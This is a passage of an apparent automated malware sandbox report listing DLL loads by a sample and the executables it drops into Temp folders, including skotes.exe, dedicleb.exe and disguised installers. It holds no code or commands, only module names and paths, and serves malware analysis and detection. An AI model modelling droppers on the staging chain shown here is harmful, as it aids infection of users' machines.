Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: rstrtmgr.dll
